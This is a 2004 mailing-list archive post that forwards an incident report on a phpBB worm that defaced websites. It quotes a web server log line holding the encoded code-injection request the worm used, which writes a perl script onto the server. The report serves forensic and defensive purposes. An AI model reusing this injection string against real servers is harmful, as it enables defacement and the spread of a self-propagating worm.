Hi list -- There's a new exploit hitting Web servers with PHP enabled. The 'sploit leaves clear signatures in Web server access logs; I've taken the liberty of forwarding a message from another list that includes forensics. cheers, merry winter holidays -- tbird > -----Original Message----- > From: Shannon Lee [mailto:shannon@private] > Sent: Monday, December 20, 2004 3:51 PM > To: bugtraq@private > Subject: phpBB Worm > > > This morning one of our client's sites was found to have been > defaced with the words "NeverEverNoSanity WebWorm Generation > 9." The defacement appeared to take place on all .html files > in the web root trees of multiple virtual hosts on the web > server in a very short period of time. > > After some investigation, we determined that the attacker had > gained access via phpbb in a series of crafted URL requests, like so: > > 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET > /viewtopic.php?p=9002&sid=f5 > 399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fope > n(chr(109)%252echr > (49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252ech > r(102),chr(97)),ch > r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252ech > r(114)%252echr(47) > %252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112 > )%252echr(101)%252 > echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%2 > 52echr(101)%252ech > r(32)),exit%252e%2527 HTTP/1.0" 200 13648 > "http://forum.CLIENT SITE OMITTED.com/ > viewtopic.php?p=9002&sid=f5399a2d243cead3a5ea7adf15bfc872&high light=%2527%252Efw > rite(fopen(chr(109)%252echr(49)%252echr(104)%252echr(111)%252e > chr(50)%252echr(11 > 1)%252echr(102),chr(97)),chr(35)%252echr(33)%252echr(47)%252ec > hr(117)%252echr(11 > 5)%252echr(114)%252echr(47)%252echr(98)%252echr(105)%252echr(1 > 10)%252echr(47)%25 > 2echr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(10)% > 252echr(117)%252ec > hr(115)%252echr(101)%252echr(32)),exit%252e%2527" > "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" > > After checking the phpbb site, it turns out that this is a > vulnerability posted the 18th of November, called Hilight; we > didn't update to prevent it because the client whose domain > it was has their own admin, and we thought he was taking care > of phpBB. Oops. The exploit is described here: > > http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513 > > When I copied all these entries out of the log and translated > the chr() calls, they turned out to be the attached perl > script, which is capable of finding .html files to deface, > and then going to google and finding more instances of phpbb > to infect. Which makes it a worm. It also tracks itself by > generation; we were generation 9. > > Please find attached the above-mentioned script as well as > the series of log entries from access_log. > > --Shannon > >
_______________________________________________ LogAnalysis mailing list LogAnalysis@private http://lists.shmoo.com/mailman/listinfo/loganalysis
This archive was generated by hypermail 2.1.3 : Tue Dec 21 2004 - 14:57:04 PST